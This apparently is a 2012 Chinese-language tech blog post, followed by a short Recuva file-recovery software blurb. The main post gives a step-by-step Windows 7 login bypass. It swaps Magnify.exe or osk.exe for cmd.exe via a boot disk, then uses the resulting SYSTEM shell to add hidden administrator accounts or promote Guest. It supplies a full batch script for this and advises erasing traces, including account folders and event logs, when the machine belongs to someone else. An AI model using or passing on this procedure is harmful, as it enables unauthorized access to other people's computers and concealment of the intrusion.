電腦不難~資訊一把抓~

關於Win7登入密碼的漏洞漏洞是僅限於單機操作沒錯，但原VISTA就有的漏洞，但在WIN7還是存在，而且從Win2000開始就有類似漏洞，像Win2000輸入法點說明可變相執行cmd.exe漏洞般，而Win7的漏洞更是顯得可笑，MS對漏洞根本不重視。

將Magnify.exe 放大鏡備份後，再將檔案實際替換成cmd.exe
重新啟動Windows 7,並啟用放大鏡/螢幕小鍵盤

最常見，下載Win PE / XPE 之類的啟動光碟，再用光碟啟動電腦,並選擇進入Win PE
將c:\windows\system32下的Magnify.exe重新命名為Magnify1.exe ; 將cmd.exe複製並命名為Magnify.exe
;dos批次指令內容;
cd c:\windows\system32\
ren Magnify.exe Magnify1.exe
copy cmd.exe Magnify.exe

當然如果你有機會能直接在Win7中，
並且是在最高權限帳戶下，就直接執行編輯好的批次檔

重新啟動Windows 7並啟用放大鏡，實際是執行替換成的cmd.exe

總之不管是將螢幕小鍵盤osk.exe 還是放大鏡Magnify.exe...改名成cmd.exe，只要你能登入時實際執行cmd.exe

我先說好了，基本上就是osk.exe/Magnify.exe / arrator.exe其中之一，替換成cmd.exe 以system次管理者身份權限執行下列動作。

這代表什麼，system次管理者身份是什麼東東??
system次管理者身份介於administrator之間，是沒有權限但可以設定權限

先輸入 net user  看目前有什麼帳戶存在

如果你從沒設定過administrator的密碼，就只是啟用原有最高權限帳戶
輸入 net user administrator /active:yes ,重新啟動後修改密碼即可登入...
就是失敗有設定過administrator的密碼

如果你有設定過administrator的密碼，那也只是需要建立新的最高權限帳戶

建立新帳戶asd 密碼123456，並使其有administrators最高管理者權限net user asd 123456 /add
net localgroup administrators asd /add

你其實可以直接啟用內建但被禁用的Guest帳戶，並變更為最高權限帳戶
net user Guest /active:yes
net localgroup administrators Guest /add

最後記得擦屁股，如果你用的電腦是別人的話
切換使用者帳戶或登出，看見多出的帳戶不是很奇怪嗎

administrator變回禁用
net user administrator /active:no

刪除新帳戶asd
net user asd /delete

Guest帳戶變回原本Guests權限並禁用
net localgroup administrators Guest /del
net user Guest /active:no

最重要的事：刪除帳戶目錄
(可能不重要，如果原電腦主人沒發現c:\user 內有多幾個目錄):

先切換到c:\user查看有什麼目錄
cd c:\user |dir
刪除新帳戶asd目錄

rd /s/q  asd

我再說一下，system次管理者身份介於administrator之間，是沒有權限但可以設定權限
輸入 net user  看目前有什麼帳戶存在

win7.cmd內容，請勿改名，這樣只要在cmd.exe輸入win7
==
cls
@echo off
echo.
echo. 現在時間 %date% %time%
echo. 第一次執行時空白輸入，將使用預設帳號asd 預設密碼123456
echo. 第一次輸入帳號和密碼會暫時記錄，若因暫時記錄有輸入錯誤請自行修正
net user
echo.-------------------------------
echo. (1)建新帳戶  (2) 刪除帳戶 (3)最高權限
echo.
echo. (4)來客權限  (5)一般權限  (6)重啟帳戶
echo.
echo. (7)禁用帳戶  (8 更改密碼  (9)離開
echo.-------------------------------
echo.刪除帳戶目錄  c:\user 內有多幾個目錄
echo.刪除新帳戶asd目錄指令  rd /s/q  asd
echo.-------------------------------
echo.查詢帳戶語法 : net user 帳戶名
set /p win7=

if %win7%==9 goto exit
if %win7%==8 goto pass
if %win7%==7 goto activeno
if %win7%==6 goto activeyes
if %win7%==5 goto pwuser
if %win7%==4 goto pwguests
if %win7%==3 goto pwadm
if %win7%==2 goto pwdel
if %win7%==1 goto pwadd

:exit
exit

: pass
echo.需先取得最高權限，才可以更改密碼
SET /P pd=帳戶:
SET /P pw=更改密碼:
if defined pd (echo 建立帳戶%pd%，請確定沒有重複帳戶) else (echo 你沒有輸入帳戶)
if "%pd%"=="" (echo 空白時預設帳戶asd) &&  set pd=asd
if defined pw (echo 密碼%pw%，請記好你剛輸入的密碼) else (echo 你沒有輸入密碼)
if "%pw%"=="" (echo 輸入為空白時，預設密碼123456) &&  set pw=123456
echo.net user %pd% %pw%
net user %pd% %pw%
ping 127.0.0.1 -n 5 -w 1000 > nul
goto WIN7exit

:activeno
SET /P pd=禁用帳戶:
if defined pd (echo 禁用帳戶%pd%，請確定有此帳戶) else (echo 你沒有輸入帳戶)
if "%pd%"=="" (echo 空白時輸入預設帳戶asd) &&  set pd=asd
echo.net user asd /active:no
net user asd /active:no
ping 127.0.0.1 -n 5 -w 1000 > nul
goto WIN7exit

:activeyes
SET /P pd=啟用帳戶:
if defined pd (echo 啟用帳戶%pd%，請確定有此帳戶) else (echo 你沒有輸入帳戶)
if "%pd%"=="" (echo 空白時輸入預設帳戶asd) &&  set pd=asd
echo.net user asd /active:yes
net user asd /active:yes
ping 127.0.0.1 -n 5 -w 1000 > nul
goto WIN7exit

:pwuser
SET /P pd=變更為user權限帳戶:
if defined pd (echo 變更帳戶%pd%，請確定有此帳戶) else (echo 你沒有輸入帳戶)
if "%pd%"=="" (echo 空白時輸入預設帳戶asd) &&  set pd=asd
echo.net localgroup guests asd /add    取得guests權限
net localgroup administrators %pd% /del
net localgroup guests %pd% /del
ping 127.0.0.1 -n 5 -w 1000 > nul
goto WIN7exit

:pwguests
SET /P pd=變更為Guests權限帳戶:
if defined pd (echo 變更帳戶%pd%，請確定有此帳戶) else (echo 你沒有輸入帳戶)
if "%pd%"=="" (echo 空白時輸入預設帳戶asd) &&  set pd=asd
echo.net localgroup guests asd /add    取得guests權限
net localgroup administrators %pd% /del
net localgroup guests %pd% /add
ping 127.0.0.1 -n 5 -w 1000 > nul
goto WIN7exit

:pwadm
SET /P pd=變更為最高權限帳戶:
if defined pd (echo 變更帳戶%pd%，請確定有此帳戶) else (echo 你沒有輸入帳戶)
if "%pd%"=="" (echo 空白時輸入預設帳戶asd) &&  set pd=asd
echo.net localgroup administrators %pd% /add
net localgroup administrators %pd% /add
ping 127.0.0.1 -n 5 -w 1000 > nul
goto WIN7exit

:pwdel
SET /P pd=刪除帳戶:
if defined pd (echo 變更帳戶%pd%，請確定有此帳戶) else (echo 你沒有輸入帳戶)
if "%pd%"=="" (echo 空白時輸入預設帳戶asd) &&  set pd=asd
echo.net user %pd% /delete
net user %pd% /delete
ping 127.0.0.1 -n 5 -w 1000 > nul
goto WIN7exit

: pwadd
SET /P pd=建立新帳戶:
SET /P pw=密碼:
if defined pd (echo 建立新帳戶%pd%，請確定沒有重複帳戶) else (echo 你沒有輸入帳號)
if "%pd%"=="" (echo 空白時預設帳戶asd) &&  set pd=asd
if defined pw (echo 密碼%pw%，請記好你剛輸入的密碼) else (echo 你沒有輸入密碼)
if "%pw%"=="" (echo 輸入為空白時，預設密碼123456) &&  set pw=123456
echo.net user %pd% %pw% /add
echo.net localgroup administrators %pd% /add
net user %pd% %pw% /add
net localgroup administrators %pd% /add
ping 127.0.0.1 -n 5 -w 1000 > nul
goto WIN7exit

:WIN7exit
net user %pd%
===
以上是我最原始的批次檔內容廢話敘述很多，後來簡化過一次，發現依一般人需求只有4個而已
只要作  1.建立最高權限帳戶 2.刪除最高權限帳戶和其帳戶目錄  3.啟用/禁用此最高權限帳戶三個選項就好了

不過我想應該只要，1.建立最高權限帳戶 2.刪除最高權限帳戶和其帳戶目錄，所以win7.cmd只要打兩行就可以了

請問有人複制上面的東西了嗎，其實可以不用那麼麻煩
對了!記得執行 logoff 登出指令，沒人改密碼還要重開機的
你也可以呆呆的用explorer.exe再執行切換使用者或登出
當然你也可以很帥氣的輸入 user32.dll,LockWorkStation

p.s:我是用不啟動explorer.exe但卻用win視窗鍵+L來登出啦

執行compmgmt.msc，點擊事件檢視器→系統→事件，可以看到登入登出關機等記錄。
這其實也可以用另類的手法刪除或修改及使其時間的操作不存入記錄內。

又發現一套超好用的免費軟體，可以幫我們將影片、照片、Word、Excel文件...等等被誤刪的檔案救回來。如果你不小心刪除了重要檔案，別慌張，只要馬上執行Recuva File Recovery軟體，”大部分”都還有機會可以救回來唷！

Recuva File Recovery是一套相當好用的免費軟體，除了英文、繁體中文、簡體中文等版本之外，還內建了其他國家的十多國語系。軟體在安裝或使用時完全不用輸入序號或破解。

軟體名稱：Recuva File Recovery

軟體版本：v1.42.544

軟體語言：繁體中文、簡體中文（內含多國語系）
軟體性質：免費軟體
檔案大小：2.33MB
系統支援：Windows 98/2000/XP/2003/Vista/7
官方網站：http://www.piriform.com/recuva/download
軟體下載：按這裡
軟體下載(備用載點)： rcsetup142.exe (2.45 MB)

Recuva File Recovery軟體提供相當特別的「指引精靈」功能，當我們要還原被誤刪的檔案時，可以先自行選擇檔案的類型，如圖檔、音樂、文件、影片…等，接著再依照原本檔案存放的位置來加快找回檔案的速度。除了指定尋找文件夾、磁碟機或記憶卡，我們也可指定只找「資源回收筒」或其他你指定的資料夾，這樣可以不用翻變整顆硬碟找檔案，只要針對檔案原本該在的地方去挖就好。

電腦不難~資訊一把抓~

公益廣告

2012年4月15日星期日

關於Win7登入密碼的漏洞

2012年4月8日星期日

Recuva File Recovery v1.42.544 把被刪除的檔案救回來！

2012年4月7日星期六

Visual Subst: 設定虛擬磁碟機以快速切換資料夾

為資料夾圖示換上繽紛色彩:FolderIcons(資料夾變身工具)